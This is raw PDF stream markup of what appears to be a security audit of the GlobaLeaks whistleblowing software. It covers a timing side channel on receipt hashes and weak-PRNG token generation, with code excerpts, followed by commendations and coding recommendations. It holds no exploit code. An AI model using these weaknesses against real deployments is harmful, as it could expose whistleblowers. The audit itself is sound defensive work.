Tf 0 0 0 rg ( ) Tj (receiver) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 247.0277 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 229.0277 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 199.0277 cm
q
BT 1 0 0 1 0 14 Tm 2.597126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status:) Tj /F1 10 Tf ( ) Tj 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept ) Tj 0 0 0 rg (shows that this channel does leak this) Tj T* 0 Tw (information; we have not addressed the feasibility of exploiting it.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 199.0277 cm
Q
 
endstream
endobj
% 'R373': class PDFStream 
373 0 obj
% page stream
<< /Length 3070 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.6: Timing Leak of Receipt Hashes) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Receipt hashes can leak via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 696.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract the hash of a whistleblower's receipt.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.046457 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker must know the Node's receipt salt and be able to measure the time it) Tj T* 0 Tw (takes the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server to respond to their requests.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 636.0236 cm
q
BT 1 0 0 1 0 14 Tm .129986 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The receipt salt is stored in the Node's database on the filesystem. See also ) Tj 0 0 .501961 rg (Issue J: Attacker) Tj T* 0 Tw (May Be Able To Extract Secrets Through Side-Channel Attacks) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 618.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 600.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The hash of the whistleblower's receipt is looked up in the database.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 539.8298 cm
q
q
.91919 0 0 .91919 0 0 cm
q
1 0 0 1 6.6 7.180237 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 510 36 re B*
Q
q
BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (wb_tip) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (WhistleblowerTip) Tj (,) Tj  T* (                    ) Tj (WhistleblowerTip) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (receipt_hash) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (hashed_receipt) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 519.8298 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 501.8298 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 483.8298 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 483.8298 cm
Q
 
endstream
endobj
% 'R374': class PDFStream 
374 0 obj
% page stream
<< /Length 8249 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.844269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (When deployed on some systems, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (may generate some of its secrets with an) Tj T* 0 Tw (insecure pseudo-random number generator, ) Tj /F3 10 Tf (PRNG) Tj /F1 10 Tf (, and an attacker might be able to guess them.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.924269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Every case where the ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (output is used, which requires non-predictability, is affected on) Tj T* 0 Tw (vulnerable configurations. Here are some ) Tj /F4 10 Tf (non-exhaustive ) Tj /F1 10 Tf (cases which we have not fully verified:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
Q
q
1 0 0 1 62.69291 666.0236 cm
Q
q
1 0 0 1 62.69291 642.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.80998 Tw (File download tokens may be guessable allowing remote attackers to download Tip submissions) Tj T* 0 Tw (without any user account, nor any explicit download token sharing.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 636.0236 cm
Q
q
1 0 0 1 62.69291 612.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.765366 Tw (Receipts may be compromised, allowing a remote attacker to authenticate as one or more) Tj T* 0 Tw (Whistleblowers.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 606.0236 cm
Q
q
1 0 0 1 62.69291 582.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.571647 Tw (Web session tokens may be compromised, allowing remote attackers to hijack existing web) Tj T* 0 Tw (sessions.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
Q
q
1 0 0 1 62.69291 540.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.459213 Tw 12 TL /F1 10 Tf 0 0 0 rg (Web ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (protection tokens may be guessed, allowing attackers to compromise victim users by) Tj T* 0 Tw 3.854269 Tw (convincing them to visit malicious web pages on any site with the same browser instance) Tj T* 0 Tw (authenticated to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 540.0236 cm
Q
q
1 0 0 1 62.69291 510.0236 cm
q
BT 1 0 0 1 0 14 Tm .19152 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note, this vulnerability is particularly pernicious because the ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (security depends on specific operating) Tj T* 0 Tw (system configurations, and a fallback to an insecure ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (is ) Tj /F4 10 Tf (a silent security failure) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 468.0236 cm
q
BT 1 0 0 1 0 26 Tm .294983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (When a weak pseudo-random number generator is used, the attacker needs to know) Tj T* 0 Tw 1.580574 Tw (the state to predict future and past outputs. They can acquire the state by brute-force guessing or by) Tj T* 0 Tw (reverse-engineering it from known outputs.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 438.0236 cm
q
BT 1 0 0 1 0 14 Tm .814431 Tw 12 TL /F1 10 Tf 0 0 0 rg (An example output might be easy to acquire by any remote attacker without any account, such as if the) Tj T* 0 Tw /F3 10 Tf (PRNG ) Tj /F1 10 Tf (output appears as a web session token provided in an ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (response prior to user authentication.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 396.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.716235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The attack is only feasible when ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is deployed in such a way that the random) Tj T* 0 Tw .517674 Tw (number generators are not secure. For example, ) Tj /F4 10 Tf (Linux ) Tj /F1 10 Tf (systems without ) Tj /F3 10 Tf (/dev/urandom ) Tj /F1 10 Tf (and on ) Tj /F4 10 Tf (Solaris) Tj /F1 10 Tf (,) Tj T* 0 Tw (where ) Tj /F3 10 Tf (uuid_generate_random\(\) ) Tj /F1 10 Tf (may not be cryptographically secure.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 366.0236 cm
q
BT 1 0 0 1 0 14 Tm .660751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This vulnerability was verified by inspecting ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (source code, and the source code) Tj T* 0 Tw (of the libraries it uses.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 348.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 318.0236 cm
q
BT 1 0 0 1 0 14 Tm 5.080751 Tw 12 TL /F3 10 Tf 0 0 0 rg (uuid4\(\) ) Tj /F1 10 Tf (is used for the file-download token and collection-download token. This is done in) Tj T* 0 Tw /F3 10 Tf (handlers/base.py ) Tj /F1 10 Tf (as follows:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 176.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 132 re B*
Q
q
BT 1 0 0 1 0 110 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (uuid4) Tj (\(\)\)) Tj  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (id_val) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# this is just a debug/informative information) Tj /F3 10 Tf 0 0 0 rg  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expireCallbacks) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj ([]) Tj  T*  T* (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj 0 0 0 rg  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_expireCall) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (reactor) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (callLater) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (tokenTimeout) Tj (,) Tj ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expire) Tj (\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 108.8236 cm
q
BT 1 0 0 1 0 50 Tm 1.314147 Tw 12 TL /F1 10 Tf 0 0 0 rg (If ) Tj /F3 10 Tf (libuuid ) Tj /F1 10 Tf (or ) Tj /F3 10 Tf (libc ) Tj /F1 10 Tf (are loadable and have a ) Tj /F3 10 Tf (generate_random_uuid\(\) ) Tj /F1 10 Tf (function, then ) Tj /F3 10 Tf (uuid4\(\)) Tj T* 0 Tw .326136 Tw /F1 10 Tf (will use that. Otherwise, it will use ) Tj /F3 10 Tf (os.urandom\(\)) Tj /F1 10 Tf (. On Linux, ) Tj /F3 10 Tf (generate_random_uuid\(\) ) Tj /F1 10 Tf (tries to read) Tj T* 0 Tw .761235 Tw (from ) Tj /F3 10 Tf (/dev/urandom) Tj /F1 10 Tf (, but will fall back to an insecure random number generator if that fails. On Solaris,) Tj T* 0 Tw 1.950814 Tw (the ) Tj /F3 10 Tf (generate_random_uuid\(\) ) Tj /F1 10 Tf (manpage does ) Tj /F4 10 Tf (not ) Tj /F1 10 Tf (explicitly say it attempts to use a cryptographic) Tj T* 0 Tw (random number generator, so it may not be cryptographically secure on Solaris.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 90.82362 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
 
endstream
endobj
% 'R375': class PDFStream 
375 0 obj
% page stream
<< /Length 1394 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 741.0236 cm
q
BT 1 0 0 1 0 14 Tm .497318 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators need to make sure ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is deployed on a) Tj T* 0 Tw (system with a functioning ) Tj /F3 10 Tf (/dev/urandom) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 723.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 693.0236 cm
q
BT 1 0 0 1 0 14 Tm 4.399147 Tw 12 TL /F1 10 Tf 0 0 0 rg (Generate secrets using a random number generator that's designed for cryptographic use, like) Tj T* 0 Tw /F3 10 Tf (os.urandom\(\)) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 675.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
Q
q
1 0 0 1 62.69291 669.0236 cm
Q
q
1 0 0 1 62.69291 657.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #831) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 657.0236 cm
Q
q
1 0 0 1 62.69291 657.0236 cm
Q
 
endstream
endobj
% 'R376': class PDFStream 
376 0 obj
% page stream
<< /Length 8654 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 747.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Design and Implementation Analysis) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 705.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.441412 Tw (This section includes the results of our analysis which are not security vulnerabilities. This includes) Tj T* 0 Tw 1.790888 Tw (commendations for good practices, recommendations for security maintenance, security in depth, and) Tj T* 0 Tw (general engineering principles.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 678.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Commendations) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
Q
q
1 0 0 1 62.69291 474.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 186 cm
Q
q
1 0 0 1 20 186 cm
Q
q
1 0 0 1 20 162 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .399983 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (does not let whistleblowers download the files they submit, in line with the ) Tj 0 0 .501961 rg (principle) Tj T* 0 Tw (of least authority) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 162 cm
Q
q
1 0 0 1 20 156 cm
Q
q
1 0 0 1 20 144 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
Q
Q
q
1 0 0 1 20 144 cm
Q
q
1 0 0 1 20 138 cm
Q
q
1 0 0 1 20 138 cm
Q
q
1 0 0 1 20 102 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.815984 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (interface has built-in user education in the form of the Tor banner and the) Tj T* 0 Tw .427045 Tw (terms of service that must be agreed to before submitting a Tip. This is an important and useful) Tj T* 0 Tw (feature, since whistleblowers may not be tech-savvy.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 96 cm
Q
q
1 0 0 1 20 60 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 2.739983 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (uses the Storm ORM for a database instead of having SQL queries, each a) Tj T* 0 Tw .087674 Tw (potential SQL injection vulnerability, spread out over the code. This makes ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (easier to) Tj T* 0 Tw (audit.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 54 cm
Q
q
1 0 0 1 20 18 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 3.98498 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has a well-developed threat model. This made it easier to understand the) Tj T* 0 Tw 3.335433 Tw (environment ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (operates in, and helps users understand the level of protection) Tj T* 0 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (provides.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 12 cm
Q
q
1 0 0 1 20 0 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Most of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (code is simple and easy to understand.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 474.0236 cm
Q
q
1 0 0 1 62.69291 447.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Recommendations) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 405.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.936647 Tw (In this section we make recommendations on design patterns, coding style, dependency selection,) Tj T* 0 Tw 3.066136 Tw (engineering process, or any other "non-vulnerability" which we believe will improve security of the) Tj T* 0 Tw (software.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 375.0236 cm
q
BT 1 0 0 1 0 14 Tm 4.32998 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our primary focus for engineering goals are ) Tj /F4 10 Tf (improving maintainability ) Tj /F1 10 Tf (to prevent future security) Tj T* 0 Tw (regressions, and ways to ) Tj /F4 10 Tf (facilitate future audits) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 351.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F5 10 Tf 0 0 0 rg (Coding Practices) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 339.0236 cm
Q
q
1 0 0 1 62.69291 339.0236 cm
Q
q
1 0 0 1 62.69291 255.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 69 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 74 Tm 1.15284 Tw 12 TL /F4 10 Tf 0 0 0 rg (GLBackend ) Tj /F1 10 Tf (is coded in a combination of ) Tj /F4 10 Tf (Twisted ) Tj /F1 10 Tf (single-thread async style with a separate thread) Tj T* 0 Tw 8.986647 Tw (pool for methods that run transactions on a database. While we examined all) Tj T* 0 Tw .184976 Tw /F3 10 Tf (@transact) Tj /F1 10 Tf (/) Tj /F3 10 Tf (@transact_ro ) Tj /F1 10 Tf (methods without finding a race condition in access to non-transactional) Tj T* 0 Tw .156098 Tw (state, we might easily have missed some, and this style of coding is prone to error: future edits could) Tj T* 0 Tw .909069 Tw (add non-local state update, or more complicated transaction-management of the database, leading) Tj T* 0 Tw .398555 Tw (to a race condition without anyone noticing. We recommend seeking some alternative \(the details of) Tj T* 0 Tw (which are future work in ) Tj 0 0 .501961 rg (Eliminating Threads) Tj 0 0 0 rg (\) running all code on the same event loop.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 249.0236 cm
Q
q
1 0 0 1 62.69291 213.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 3.039982 Tw (Random strings are generated from regular expressions. This is error-prone and this level of) Tj T* 0 Tw .484269 Tw (configurability probably isn't necessary, since the user never sees most of these random strings. It's) Tj T* 0 Tw (also hard to audit the reverse regexp code.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 207.0236 cm
Q
q
1 0 0 1 62.69291 135.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 57 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 62 Tm .92748 Tw 12 TL /F3 10 Tf 0 0 0 rg (from) Tj ( ) Tj (Crypto.Random) Tj ( ) Tj (import) Tj ( ) Tj (random ) Tj /F1 10 Tf (gives the same name to the cryptographic ) Tj /F3 10 Tf (random ) Tj /F1 10 Tf (as) Tj T* 0 Tw .839982 Tw (Python's non-cryptographic one. This is error-prone and inhibits audit verification. For example, if a) Tj T* 0 Tw 3.488555 Tw (later line has ) Tj /F3 10 Tf (import) Tj ( ) Tj (random ) Tj /F1 10 Tf (then the code in the module may have vulnerable entropy) Tj T* 0 Tw 1.112927 Tw (characteristics. An audit may pass one revision of the code, but a later code may silently add this) Tj T* 0 Tw 20.01497 Tw (vulnerability. We recommend an explicitly unique name, such as:) Tj T* 0 Tw /F3 10 Tf (from) Tj ( ) Tj (Crypto.Random) Tj ( ) Tj (import) Tj ( ) Tj (random as) Tj ( ) Tj (cryptorandom) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 129.0236 cm
Q
q
1 0 0 1 62.69291 81.02362 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
